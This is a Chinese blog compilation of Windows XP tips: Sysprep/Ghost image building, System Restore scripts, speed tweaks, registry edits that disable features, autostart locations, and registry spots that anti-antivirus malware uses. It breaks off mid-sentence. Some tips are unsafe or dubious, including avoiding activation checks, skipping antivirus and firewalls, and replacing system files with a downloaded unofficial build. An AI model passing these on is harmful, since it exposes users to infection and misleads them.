XP安装光盘的“\support\tools”目录中找到名为deploy.cab的文件，将其解压缩到硬盘中之后，运行setupmgr.exe文件即可激活安装管理器向导程序，下面就让我们一起动手试试吧。 第一步 首次运行安装管理器的时候，程序会询问你创建新文件还是修改已经保存的应答文件，一般情况下选取“创建新文件”一项。 第二步 接着程序提供了三种安装类型，其中无人参予安装的应答文件一般为Unattend.txt;Sysprep安装可以选择应答文件，一般用于自动安装模式;远处安装服务可以让我们从远程安装服务器安装Windows，在此我们选择“Sysprep”类型继续。 第三步 接下去需要选择应答文件对应的Windows版本，此时根据自己的实际情况选择，例如笔者选取“Windows XP Professional”一项。 第四步 在弹出的窗口中可以选择是否完全自动安装，一般情况下建议选择“是，完全自动安装”，否则用这个封装包光盘安装系统时候还是比较麻烦的。 第五步 点击“下一步”按钮之后进入安装管理器界面，仔细查看一下不难发现这里就是我们正常安装Windows XP过程中需要手工输入的各种信息，因此我们在这里分别设定各个参数之后就可以实现无人值守的全自动安装了。不过这些信息并非全部都要输入，只需将名称和单位、时区、产品密钥、计算机名称等几个参数设置一下即可，但是语言一项必须要选取“中文(简体)”，否则安装好的Windows XP有可能影响你的正常使用哦! 第六步 最后可以看见一个结果窗口，这里提供了应答文件的保存路径信息，确认之后即可完成自动应答文件的创建操作了。 三、重新封装 完成了上述操作之后，接下来就需要对系统进行重新封装了。这时在刚才从Windows XP安装光盘中解压缩文件夹中双击sysprep.exe文件，点击“确定”之后准备封装。 新窗口中有几个按钮，其中“审核启动”和“工厂”按钮用处不大，倒是下面的几个选项比较重要，在此简单介绍一下。 1. PnP:用于检测即插即用硬件，一般情况下勾选该项，这样系统在安装时候会对计算机中非即插即用硬件进行检测，可以一些老古董级别的硬件能够正常使用。 2. MiniSetup:最小化安装，一般建议勾选此项。 3. NoSIDGen:不生成安全标识符，这样可以避免烦人的Windows XP激活检测，因此需要勾选。 4. 已提前激活:勾选此项则意味着Windows XP系统已经默认激活状态，为了方便使用建议勾选。 设置完成之后，点击上部的“重新封装”按钮，这时Windows系统自动进行重新封装操作，完成之后会自动关闭计算机。这时候原先安装Windows XP的分区就是一个干净的封装系统盘了，最后可以通过软盘或者光盘引导计算机进入DOS模式，借助Ghost对其进行克隆镜像之后刻录为光盘保存，这样就能够用它在其它计算机上快捷安装Windows XP了。 四、注意事项 虽然通过上述方法可以制作出全新的Windows XP封装包，但是在整个操作过程以及使用中还有一些值得注意的地方，在此提醒大家注意一下。 1. 封装之前可以事先清理系统中的垃圾文件，并且进行磁盘碎片整理等操作来优化Windows系统，这样才能确保得到的封装包文件个头最小而且稳定性最好。 2. 创建自动应答文件时候，计算机名称和安装序列号一定要输入正确，因为在Ghost恢复完成重新启动的时候，系统还没有找到鼠标和键盘的驱动程序，它们都处于不可用状态，所以无法输入任何字符，完全要依靠自动应答文件来自动输入。 3. 刻录Ghost得到的镜像文件时候，不妨将其制作为系统引导光盘，同时在批处理中增加Ghost程序自动运行命令，这能够简化我们手工输入各种指令的麻烦。 4. 通过封装包安装好Windows XP系统之后，还有针对性的安装各种硬件驱动程序。但是如果仅仅用于自己计算机的快速恢复安装，则可以忽略开始的卸载驱动程序步骤。 5. 有兴趣的朋友还可以计算Ghost镜像文件的大小，利用多出来的空间安装一些系统补丁、必需的软件等等，这更方便我们直接使用计算机。 怎么样，原来Windows XP还可以通过这种方式来快速安装，如果你也想体验一下快速恢复系统的便利所在，不妨也来试试吧，相信这种封装安装方式会让你周围的朋友对你刮目相看呢! 定制你想要的Windows XP系统还原 2009-02-08 14:02:13 被42人转藏 | 小贴士:专家支招,让你的口袋疯狂起来 Windows XP内置的系统还原，是一个行之有效、且操作简单的系统修复工具。但在其“傻瓜”式的操作之中，也有很多不尽如人意的地方。对此，你有没有想过自己定制一下系统还原呢? 1.指定时间创建还原点 在进行驱动更新、补丁升级等危险性操作时，Windows XP才会自动创建还原点。为防止还原操作时造成过多数据丢失，我们可让系统在指定时间内自动创建还原点，变被动为主动。打开注册表编辑器，依次展开 “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore”子键。接着在右侧窗口中，找到并双击“RPSessionInterVal”键，该键的键值即表示系统在开机后创建系统还原点需 要等待的时间(以秒为单位)，默认值为“0”表示关闭此功能。如果想要实现开机10分钟后自动创建系统还原点，那么只需将该值修改为“600”(单位为秒)即可。 2.让系统还原忽略桌面 系统还原时包括了桌面上的项目，但其还原效果却令人难以恭维，极易造成桌面上的文件丢失。对此有过惨痛经历的朋友，不妨将“桌面”排除在备份和还原范围之外。 系统还原的设置项目保存在名为filelist.xml的配置文件中，它位于c:\Windows\System32\Restore文件夹内(它是一个隐藏文件，需要在“工具/文件夹选项/查看”中要去掉“隐藏受保护的操作文件”和选择“显示所有文件和文件夹”两个选项才可显示)。由于filelist.xml文件可定义系统还原要监控和排除的项目，所以在此稍作修改即可让它免除对桌面的监控。操作时，首先应停止系统的“System Restore Service(系统还原服务)”服务，然后取消filelist.xml的只读属性，并用记事本程序打开，在其中找到如下字节: %cookies% %favorites% „„ 该字节定义的是系统还原不需监控的项目，只要在其中插入语 句:“%SystemDrive%\Documents and Settings\当前账户名\Desktop ”(不包含引号)。之后保存filelist.xml文件，恢复其只读属性，并重新启动“System Restore Service”服务即可。 提示:filelist.Xml文件中不支持使用中文目录，否则将不能启动系统还原服务，按照类似方法还可指定其它目录和文件，来脱离系统还原的监控。 3.保存指定的还原点 还原点默认的生命周期为90天，过期后将被自动清除。当系统还原占用的空间不足时，也将清除较早创建的还原点。如果你想保留最初的还原点，那么可进行如下操作。 系统还原点默认保存在C:\System Volume Information\文件夹中，这里的GUID为计算机的全局唯一标识符。在_restore文件夹下有个RPx目录，其中x为还原点数字，它是按创建顺序排列的，我们只要保存RPx目录，即可保存指定的还原点。 如果系统分区采用了NTFS磁盘格式，则可在RPx目录的属性窗口中，设置所有用户对该文件夹的修改权限为“拒绝”即可。 4.随意控制系统还原占用空间 默认情况下，系统还原最大只能占用12%的当前磁盘空间。不过要想保存更多的还原点，就需要扩大系统还原所占用的磁盘空间，对此可进行如下操作。 右键点击打开“我的电脑/属性/系统还原”，在这里你可以选择你系统中的任一盘符，然后点击旁边的“设置”选项来设置。如你只想要还原C盘的内容就可以把其他盘符中的系统还原关闭，并且还能非常直观的托动滑条来修改系统还原的空间大小，从而能有效的避免系统还原占用过多的空间。 5.另类方法启动系统还原 有时系统严重损坏，甚至连桌面都看不到，就更不要说使用系统还原了，那这种情况下该如何处理呢? 首先可尝试进入安全模式进行系统还原，如果安全模式也无法进入，则可进入“带命令行的安全模式”，并使用管理员身份登录，最后执行“C:\Windows\System32\Restore\Rstrui”命令，即可调出系统还原程序。 提示:在系统还正常时最好测试一下此命令是否正常，如果系统还原程序本身损坏，可进入C:\Windows\inf目录，右键单击sr.inf文件，选择“安装”命令，并放入系统安装盘根据提示重新安装即可。 一键创建还原点 Windows的系统还原虽然能自动创建一部分还原点，但是在系统出现问题时，这些还原点常常不是最近的还原点。虽然能够手动创建还原点，但是手动创建还原点的过程还是比较麻烦的，有没有比较自动一点的办法呢?答案是肯定的，一起来看。 一键创建还原点可以双击桌面上的一个快捷方式就能自动创建一个还原点。 (1)在某文件夹单击右键，在弹出的快捷菜单上选择“新建?文本文件”新建一个文本文件。 (2)双击打开该文本文件，然后输入下列代码: Set IRP=getobject("winmgmts:\\.\root\default:Systemrestore") MYRP=IRP.createrestorepoint("一键创建的还原点",0,100) (3)另存或把该文件重命名为“一键创建还原点.vbs”，注意，不要另存为txt格式的文件，这里的扩展名为“.vbs”。 (4)在该文件上单击右键，在弹出的快捷菜单上选择“发送?桌面快捷方式”命令在桌面上为该文件创建一个快捷方式。 (5)根据自己的喜好，在桌面上重命名该快捷方式并为它选择一个图标。 现在好了，当您要对系统进行更改或安装程序时，双击该快捷方式，系统就会在后台为您创建一个系统还原点。 关机创建还原点 有时，错误的操作会使系统出现问题，当出现这种情况时，如果在上一次关机时有一个系统还原点，您肯定会欣喜若狂，可实事上是您并没有这样的还原点。下面的方法，可以使系统在每次关机时自动地在后台为您创建一个还原点。 (1)打开记事本，输入以下内容: Set IRP=getobject("winmgmts:\\.\root\default:Systemrestore") MYRP=IRP.createrestorepoint("关机创建的还原点",0,100) 完成后，在任意文件夹内把该文件保存为“关机创建还原点.vbs”。 (2)依次选择“开始?运行”命令，在弹出“运行”对话框中输入 “Gpedit.msc”打开组策略编辑器，在该编辑器中，左窗格依次展开“计算机配置?Windows设置?脚本(启动/关机)”，接着在右窗格双击“启动”打开“启动属性”对话框，如图所示，在该对话框上单击“添加”选择刚才创建的脚本文件“关机创建还原点.vbs”，最后单击“确定”按钮。 现在，如果系统出现问题，您就不必惊惶失措了，因为在系统中总时存在着上一次关机时的系统还原点，选择它，单击“还原”，您的系统就有恢复到上一次关机时的状态了。 让Windows系统更快更稳定的九大技巧 2009-02-08 14:01:40 被55人转藏 | 小贴士:不得不说的话题:女性身体探秘! 一、合理使用硬盘 何为合理使用硬盘呢?首先我们要了解硬盘盘片的物理结构。分区并格式化后的硬盘却是以扇区为基本单位的，一个分区是由若干个扇区构成的。那什么是扇区呢?我们都知道磁盘在工作时是转动的，它所存储的信息是按一系列同心圆记录在其表面上的，每一个同心圆称为一个磁道，在图1我们可以看到磁道和扇区的分布情况(当然，这只是个示意图而已，实物要比图中密得多!)，很多朋友认为那个红色的“大块头”是一个扇区，但正确的认识应该是黄色的那小块为一个扇区。一个扇区的大小为512字节，一个整圆环为一个磁道，一个磁道上有若干个扇区，所以我们不难看出，越靠外的磁道上的单个扇区其体积越大，换句话就是其密度越小，由于硬盘是机械传动，所以磁头对其的寻找、读、写速度也就越快，分区的分布也是从外圈向内圈的，所以C盘相对于D盘等要靠外，这就是为什么我们感觉C盘比D、E等分区要快的原因。 明白了上面的知识，我们就能合理使用硬盘了!以一块容量为60GB的新硬盘为例进行说明:把C盘分为3至5GB(视操作系统而定)，把D盘调成1GB，把E盘设为10GB，省下的就看着设吧(可对半分为F和G盘)——对系统速度没有什么影响 分好区后如何使用是最为关键的: 1、把操作系统装在C盘上并把MyIE、Foxmail、ICQ、QQ、FlashGet、超级兔子、播放器软件以及一些看图软件等常用小型软件也安装在C盘上。如果您使用诸如Office之类的微软大型软件的话，也要将其安装到C盘上。当然，由于我们并不会用到其中的全部功能，所以要定制安装那些有用的部分以节省C盘空间!然后把虚拟内存设置到D盘上(只是暂时的后再使用系统自带的磁盘碎片整 理程序把C盘整理一下。 2、使用“XXX注册表优化大师”之类的系统修改软件把“我的文档”、“上网缓冲”、“上网历史”、“收藏夹”等经常要进行写、删操作的文件夹设置到D盘上来尽量避免其它分区产生磁盘碎片而降低硬盘性能! 3、把各种应用软件安装到E盘，至于游戏可装在F盘，G盘用来存放影音文件。(个人习惯) 4、对C盘再进行一次碎片整理，然后进行完下面的第二大步后再把虚拟内存设置到C盘上! 二、虚拟内存的设置 将虚拟内存设置成固定值已经是个普遍“真理”了，而且这样做是十分正确的，但绝大多数人都是将其设置到C盘以外的非系统所在分区上，而且其值多为物理内存的2,3倍。多数人都认为这个值越大系统的性能越好、运行速度越快!但事实并非如此，因为系统比较依赖于虚拟内存——如果虚拟内存较大，系统会在物理内存还有很多空闲空间时就开始使用虚拟内存了，那些已经用不到的东东却还滞留在物理内存中，这就必然导致内存性能的下降! 虚拟内存应设置为物理内存0至1.5倍(0倍是多少啊,就是禁用～^_^)为好，而且物理内存越大这个倍数就应越小而不是越大。当物理内存等于或大于512MB时，绝大多数PC就可以禁用虚拟内存不用了，这时内存性能是最高的!^_^ 至于您的虚拟内存具体要设置成多大，您就要自己试一试了，因为这和常驻内存软件的多少和大小以及您平时运行的软件是有直接关系的，所以笔者无法给出建议值。您可先将其设为物理内存等同后，再运行几个大型软件，如果没有异常情况出现的话，您就再将其设置成物理内存的一半后再运行那几个大型软件，如果出现了异常，您就要适当加大虚拟内存的值了!以此类推，当您找到最佳值后只要把这个值设置到C盘上就OK了! 注:如果您使用的是Windows ME及以下的操作系统的话，可下载“MagnaRAM ”来优化物理内存和虚拟内存，这样的效果更好!另外，笔者建议您不要再使用那些所谓的优化和整理内存的软件了! 三、合理摆放“快捷方式” 绝大多数情况下，我们运行软件都是通常该软件的“快捷方式”来做到的，硬盘越来越大，安装的软件也越来越多，有很多朋友喜欢把快捷方式都放到桌面上，这样不但使您眼花缭乱，而且系统性能也会下降，而且会造成系统资源占用过大而使系统变得不稳定，所以我们最好把桌面上的快捷方式控制在10个左右，其它的快捷方式可全放到开始菜单和快捷启动栏中，而且把所有软件的“卸载”快捷方式删除以提高系统性能。另外，尽量不要存在重复的快捷方式。 四、慎用“安全类”软件 这里所说的安全类软件就是指实时性的防毒软件和防火墙。该类软件对系统资源和CPU资源的占用是非常大的(有的高达30%以上)，如果您不经常上杂七杂八网站的话，这类软件完全没有必要使用!这比对CPU进行超频可实际、方便得多了! 五、减少不必要的随机启动程序 这是一个老生常谈的问题，但很多朋友并不知道什么程序是可以禁止的，什么是不能禁止的，所以很多人并没有进行这一步的工作。有了优化大师这一工作就简单得多了，在该软件界面的“开机速度优化”中优化大师会提示您什么可以禁止，什么不能禁止! 这样做的好处除了能加快启动速度外，还能提高系统在运行中的稳定性! 六、合理设置“图标缓存” 通常系统默认的图标缓存都是比较大的，这明显有浪费的感觉，所以我们要将其值做适当的调整，我们可用“Windows优化大师”查看一下当前系统已经使用了多少图标缓存，然后我们将其值设为实际大小的2倍左右即可。注:部分电脑可能无法使用优化大师进行修改，这时您可使用“超级兔子魔法设置”进行修改! 另外，桌面背景也不要弄得太复杂(建议设为“无”)，有的朋友还做成了动画桌面，这种做法没有任何现实意义，除了会给系统带来不稳定因素外，没有任何好的作用——毕竟我们只有很少时间是面对桌面的!^_^ 七、合理设置“磁盘缓存” 系统默认值通常都非常保守，所以我们要进行一定的修改，我们也可在“Windows优化大师”中对其进行修改，只是我们要手工进行数字的输入，磁盘缓存最小值可设为2048(KB)，最大值设为物理内存的25%，缓冲区读写单元为512。 注:这一做法会对多媒体软件的稳定运行带来很大的好处，尤其是最小值的设置不要太低! 八、尽量精简右键菜单 很多程序在安装后都会在右键菜单中留下身影，其中有很多都是我们用不到的，但其却给我们的系统带来了负担。为此，我们可在“超级兔子魔法设置”等软件中对右键菜单进行精简，通常只保留常用的就行了!另外，您最好是将无用 项删除而不是只单纯去掉其前面的小勾! 这样做可有效减少因“新建”菜单而引起的失去响应的现象出现! 九、合适的显示器刷新率和分辨率 有些朋友总是抱怨自己的显卡太差劲，有的显卡的确是差劲了些，但很多情况下都是因为显示器刷新率设置得过高所致的“假象”。通常15、17英寸的彩显将刷新率设置成75Hz以上就行了(如果带宽足够当然也可以更高)，没有必要强行上得太高。分辨率也是同一个道理，通常设成800×600或1024×768就行了，只要够用就好，完全没有必要玩什么“终极”和“骨灰”。 这样做比对显卡进行超频带来的提速效果要大多了! 提高效率:屏蔽Win XP中不需用到的功能 2009-02-08 14:01:06 被25人转藏 | 小贴士:网络潮人的流行用语，你懂多少, 一、撤消对压缩文件的支持 从Windows Me开始，微软就在系统内置了对ZIP文件的支持，用户可以把ZIP文件当成文件夹浏览。 现在WinRAR已经是时下最流行的压缩软件，想必你的系统装上了这套软件。禁Zip文件功能，只需取消zipfldr.dll的注册就可以了。点击“开始?运行”，在运行输入框中输入“regsvr32 /u zipfldr.dll”(不包括引号，下同)，回车即可。 同样，如果不喜欢系统查看CAB压缩包，输入“regsvr32 /u cabview.dll” 来取消对cabview.dll的注册。 二、撤消视频预览和刻录功能 每当用资源管理器选中一个视频文件时，XP会在左侧面板预览显示，不过这对于较大的视频文件时，往往要读上半天。 用户在大多数情况下并不需要预览，禁止的方法也非常简单，在运行输入框 中输入“regsvr32 /u schmedia.dll”即可撤消视频预览。 Windows Media Player从8.0开始加入了刻录功能，且不说它的Bug，单单功能上无法与Nero等专业软件相比。禁止这项功能得修改注册表，在注册表编辑器中展开主键 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion]，在右面板新建一名为“NoCDBurning”双字节值(DWORD)，值修改为“1”即可。 三、撤消注册表编辑器的记忆功能 Windows XP继承了在Windows Me时注册表编辑器的记忆能力，但这项功能却起了事得其反的效果，造成用户操作不便，撤消要经过两个步骤: 1.运行注册表编辑器，依次找到主键 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\ Regedit]，将右面板的“LastKey”键值删除; 2.在左面板的Regedit分支上单击鼠标右键，在弹出的快捷菜单中择选“权限”命令，在“Administrators 的权限”窗口中将“完全控制”和“读取”两项设置为“拒绝”即可。 四、撤消检查预定的任务 每当系统连接到其他的计算机后会检查对方计算机上所有预定的任务，检查时需要30秒的等待时间。我们可不希望把时间耗在这上面，在注册表编辑器中展开主键 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explore r\RemoteComputer\NameSpace]，删除其子键——，Windows就不再检查预定任务了。 五、撤消IE组件自动安装功能 由于系统采用了IE组件自动安装，有时使用Internet Explorer浏览器访问某些网页时，会弹出下载安装IE组件程序的对话框。这项功能笔者并不是很喜欢，如果你也有这种感觉的话，可以通过组策略按下面的步骤撤消: 1.在“运行”对话框中输入“gpedit.msc”，激活“组策略”管理窗口。 2.在左边的控制台树中依次展开“计算机配置?管理模板?Windows组件?Internet Explorer”，然后在右面板双击“禁用Internet Explorer组件的自动安装”选项，打开“禁用Internet Explorer组件的自动安装 属性”对话框。 3.在“设置”选项卡中将“禁用Internet Explorer组件的自动安装”设置为“已启用”，点击“确定”按钮让设置生效即可。 以后当你使用IE时，系统就不会自动安装IE组件程序了。如果以后你想要重新使用Internet Explorer组件自动安装功能时，只要将“禁用Internet Explorer组件的自动安装”设置为“已禁用”即可。 同法设置“禁用定期检查Internet Explorer软件更新”选项可以定制是否进行IE的定期更新操作。 六、撤消Windows XP自动重新启动和自动发送错误报告 是不是有时使用Windows XP时，弹出一些错误提示后，Windows XP自动重启，这是因为微软设计了自动重启功能，不过对于一些用户，这项功能不但没帮到忙，反而丢失了未来得及保存的数据。 在桌面上的“我的电脑”图标(开始菜单的“我的电脑”图标也可)右键单击，在弹出的菜单选择“属性”，在弹出的属性窗口中切换到“高级”标签页，单击“启动和故障恢复”组的“设置”按钮，在弹出的窗口中撤消“自动重新启动”的复选框即可。 同样，在“高级”标签页中单击“错误报告”按钮，在弹出的“错误报告”窗口，选择“禁用错误报告”方式，并撤消“但在发生严重错误时通知我”复选框，最后单击“确定”按钮返回。从此系统错误报告就不会再出来烦你了。 七、撤消分组相似任务栏 分组相似任务栏功能可以在打开过多任务窗口的时候自动分组相似任务栏按钮，分组后由同一程序打开的多个窗口将会折叠成一个按钮，鼠标左键单击此按钮会显示出所有的窗口，鼠标右键单击该按钮则可以一次性关闭这些窗口。 但是这项功能会给我们在多个任务窗口中进行切换带来麻烦，如果要禁止它的话，可以使用鼠标右键单击任务栏的空白处，在弹出的菜单中选择“属性”，在“任务栏”标签中取消“分组相似任务栏按钮”即可。 其实这项功能可以让用户更方便管理窗口，只是系统过早地进行任务栏分组，我们可以通过修改注册表定制此功能:在注册表编辑器中依次展开主键[HKEY_CURRENT_Software\Microsoft\Windows\CurrentVersion\Explorer\Adva nced]，在右窗口中新建一名为“TaskbarGroUPSize”双字节键值项(DWORD值类型)，并赋值希望的具体窗口数量，如设置为8个，则任务栏上打开的窗口达到8个后系统才会进行任务栏分组。 八、撤消隐藏不活动的图标 当系统托盘里的图标非常多时，Windows XP会自动检测并隐藏已经有一段时间不活动的图标。不喜欢系统自作聪明吧，通过下面的方法来禁止它:在任务栏的空白处单击鼠标右键，在弹出的快捷菜单中选择“属性”，在“任务栏”标签中将“隐藏不活动的图标”取消即可。当然，觉得此功能好用的用户可以单击“自定义”按钮里可以自行设置有关项目的隐藏和显示，有目的地使用这项功能。 九、撤消桌面清理向导 默认情况下，系统将每隔60天自动运行桌面清理向导，该向导会将你在最近60天内未曾使用的快捷方式图标并移动到桌面上新建的“未使用的桌面快捷方式”的文件夹中。 撤消的方法也挺简单的:在桌面单击鼠标右键，在弹出的快捷菜单中选择“属性”，在“显示属性”对话框中选择“桌面”标签，然后单击“自定义桌面”按钮，在“常规”标签项中撤消“每60天运行桌面清理向导”复选框。 十、撤消磁盘空间报告 当硬盘其中一个分区的磁盘剩余空间比较少的时候，Windows XP就会不停地在任务栏上弹出磁盘不够的提示框“骚扰”着用户。撤消它还得用到注册表编辑器，依次展开[HKEY_CURRENT_USER/Software/Microsoft]分支，同样在右窗口中新建一名为“NoLowDiskSpaceChecks”双字节键值项，将赋值为“1”，重启 系统后即可生效。 当然，删除Windows XP的自带功能的其他项目还有很多，如通过“sysoc.inf”文件删除多余的隐藏的安装组件、关闭调试器Dr.Watson、关闭系统还原等等。这些技巧想必大家耳熟能详了吧，笔者就在此略过。 系统自动启动程序之十大藏身之所 2009-02-08 14:00:32 被30人转藏 | 小贴士:QQ秘籍训练营,用QQ懂QQ Windows启动时通常会有一大堆程序自动启动。不要以为管好了“开始?程序?启动”菜单就万事大吉，实际上，在Windows XP/2K中，让Windows自动启动程序的办法很多，下文告诉你最重要的两个文件夹和八个注册键。 一、当前用户专有的启动文件夹 这是许多应用软件自动启动的常用位置，Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在:,Documents and Settings,,“开始”菜 单,程序,启动，其中“”是当前登录的用户帐户名称。 二、对所有用户有效的启动文件夹 这是寻找自动启动程序的第二个重要位置，不管用户用什么身份登录系统，放入该文件夹的快捷方式总是自动启动——这是它与用户专有的启动文件夹的区别所在。该文件夹一般在:,Documents and Settings,All Users,“开始”菜单,程序,启动。 三、Load注册键 介绍该注册键的资料不多，实际上它也能够自动启动程序。位置:HKEY_CURRENT_USER,Software,Microsoft,WindowsNT,CurrentVersion,Windows,load。 四、Userinit注册键 位置:HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,WindowsNT,CurrentVersion,Winlogon,Userinit。这里也能够使系统启动时自动初始化程序。通常该注册键下面有一个userinit.exe，但这个键允许指定用逗号分隔的多个程序，例如“userinit.exe,OSA.exe”(不含引号)。 五、Explorer,Run注册键 和load、Userinit不同，Explorer,Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有，具体位置是:HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,Policies,Explorer,Run，和HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,Policies,Explorer,Run。 六、RunServicesOnce注册键 RunServicesOnce注册键用来启动服务程序，启动时间在用户登录之前，而且先于其他通过注册键启动的程序。RunServicesOnce注册键的位置是:HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,RunServicesOnce，和HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,RunServicesOnce。 七、RunServices注册键 RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行，但两者都在用户登录之前。RunServices的位置是:HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,RunServices，和 HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion, RunServices。 八、RunOnce,Setup注册键 RunOnce,Setup指定了用户登录之后运行的程序，它的位置是:HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,RunOnce,Setup，和HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,RunOnce,Setup。 九、RunOnce注册键 安装程序通常用RunOnce键自动运行程序，它的位置在HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,RunOnce和 HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,RunOnce。HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序，运行时机在其他Run键指定的程序之前。HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。如果是XP，你还需要检查一下HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,RunOnceEx。 十、Run注册键 Run是自动运行程序最常用的注册键，位置在:HKEY_CURRENT_USER,Software,Microsoft,Windows,CurrentVersion,Run，和HKEY_LOCAL_MACHINE,SOFTWARE,Microsoft,Windows,CurrentVersion,Run。HKEY_CURRENT_USER 下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行，但两者都在处理“启动”文件夹之前。 病毒反抗杀毒软件的主要手段 如今出现了越来越多的对抗杀毒软件以及检测工具扫描的病毒，他们会关闭甚至删除杀毒软件以及检测工具。一般用户很难判断他们藏在哪里，做了些什么。而这时杀毒软件以及安全工具确普遍无法运行。 下面主要列举说明一些常见抗杀软类病毒的需要注意的检测位置。 一:Run键值 典型病毒:AV终结者变种 目的现象:开机启动双进程坚守、关闭杀毒程序等。 检测位置: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 补充说明:该位置属于常规启动项，很多程序会写。 二:执行挂钩 典型病毒:大量恶意软件以及病毒均会写入 目的现象:杀毒软件难于清理、关闭杀毒程序等。 检测位置: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteH ooks 补充说明:很少有正常程序会写入该位置，病毒几率非常大。典型例外:瑞星反病毒软件 三:Appinit_dlls 典型病毒:机器狗新变种、磁碟机变种。 目的现象:安全模式也加载、关闭杀毒程序等。 检测位置: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls 补充说明:很少有正常程序会写入该位置，病毒几率变态大。典型例外:AVG互联网安全套装 四:服务以及驱动: 典型病毒:灰鸽子变种 目的现象:难于发现与清理、关闭杀毒程序等。 检测位置: HKLM\System\CurrentControlSet\Services 补充说明:病毒写入底层服务与rootkits驱动，导致清除困难。 五:映像劫持 典型病毒:大多数AV病毒均会写入此位置 目的现象:简单粗暴地让某个特定文件名的文件无法执行 检测位置: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 补充说明:被劫持的文件不一定是exe文件。如Papa在处理恐怖鸡感染号病毒时，为了防止ani.ani还原病毒主文件，便劫持ani.ani文件。 六:目前已知删除安全软件文件的检测位置 典型病毒:飘雪变种 目的现象:杀毒软件安装文件被删除、sreng改名后运行立即被删除等。 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskSch eduler HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDela yLoad 补充说明:已知变种均会修改hosts文件、在QQ目录下写入隐藏的病毒dll并且修改API HOOH。 七:Boot.ini文件 典型病毒:磁碟机变种 目的现象:独占访问Boot.ini文件，导致未更新的grub重启删除工具失效。 检测位置:Boot.ini 补充说明:在Vista操作系统下对该项检测没有意义。 小结: 检测报告的分析工作需要具备常用软件以及操作系统丰富的使用经验，才可以比较迅速准确地定位到具体问题。本文仅将对抗杀软类病毒常见的关注位置找出来供大家参考。其实还有很多病毒会加载的位置本文不做详述，请具体问题具体分析。 | 小贴士:我很喜欢这个口袋，我能订阅它么? 任务栏管理器是系统自带的一个很方便的软件。长久以来，大家也仅仅是习惯性的点击ctrl+alt+del来调出任务管理器了，然后取消某个失去相应的程序而已。其实任务管理器很强大的，它能很直观反映有系统的许多的东西，并且可以很方便的进行某些操作。在我们使用过程中有些技巧已经为大家所熟悉，但还有些技巧或许不是你都知道的，这里我给大家说一说任务栏管理器的一些应用或是技巧。看看能否对你将来使用电脑的时候有所帮助。 一. 任务管理器的调出 1. 相信大多数朋友都会用左手按住左ctrl和alt，然后右手点击小键盘的del键来调出任务栏管理器。 2.单手按住左边的ctrl和alt，伸出一个手指来按文档控制的那个delete键也相当与ctrl+alt+del的功效。 3.你也可以选用右手按ctrl+alt+Esc也能调出任务管理器。 4.最简单的方法就是用鼠标在任务栏空白处点击右键，在弹出的菜单选择任务栏管理器即可。 二. 任务管理器的外观 1. 这个问题曾经困扰着一些人，因为他们不小心把任务栏管理器弄成一个空白框，不知道怎么恢复了。其实很简单，之所以能弄成这个样子，是因为你在任务管理器窗体上双击了左键。解决的方法也是相当的简单:再次双击就回复正常窗口的样子。 2. 选择不同的选项卡后再对窗体双击可以有不同的内容显示，这样你可以更加详细的对进程，或是网络cpu占用情况分析了。 三. 任务栏管理器个选项卡的技巧 1. 应用程序栏:任意窗口的层叠，通过任务栏右键菜单中的“层叠窗口”命令，可以让所有打开的窗口层叠显示，但如果只是想让其中的几个窗口层叠显示出来，就要借助任务管理器了。在任务管理器的“应用程序”选项卡中选中想要层叠显示的程序窗口，然后单击右键，从菜单中执行“层叠”命令即可。此外，我们还可以随意最大化、最小化或前置指定的窗口。 2. 进程栏:在任务管理器的菜单—》查看—》选择列中可以定义要在进程栏里显示的内容，这里有许多专业的分析项目可以供你选择，比如虚拟内存大小。有些软件占用内存特别小的原因就是它用了不小的虚拟内存。默认的情况下，Windows XP任务管理器中的进程列表并不是按照名称进行排列的，查看起来不太方便，只要单击列表栏上方的文字标签，就可以让进程列表按序排列。例如单击“映像名称”标签，列表就会以进程名称的英文字母进行排序，单击“内存”标签，则可以按照内存使用量进行排序。 3. 用户栏:在这个栏目里，你可以注销已经登陆本机用户。如果你的权限足够，你可以断开任何登陆用户的登陆，如果有远程用户登陆本机。你可以选择发送消息给他。 四. 任务栏管理器的升级 其实任务栏管理器本身算的上一个不用安装的绿色程序了。你只需要把它拷倒你的机器上就能用了。最近网上流传着longhorn的任务管理器。这个版本的任务栏管理器比现在的windows xp版本任务栏管理器在进程那个选项里多了一个“映象路径”的功能，这样你就可以很方便的定位现在运行的进程位置。这一特性在我们对于可疑进程的鉴别上很有帮助。当然你可以用它来替换你现在使用的任务管理器。下载地址:,三个文件覆盖 Windows\system32\dllcache 下的同名文件。2、再用这三个文件覆盖 Windows\system32 目录下的同名文件，此时会弹出“Windows 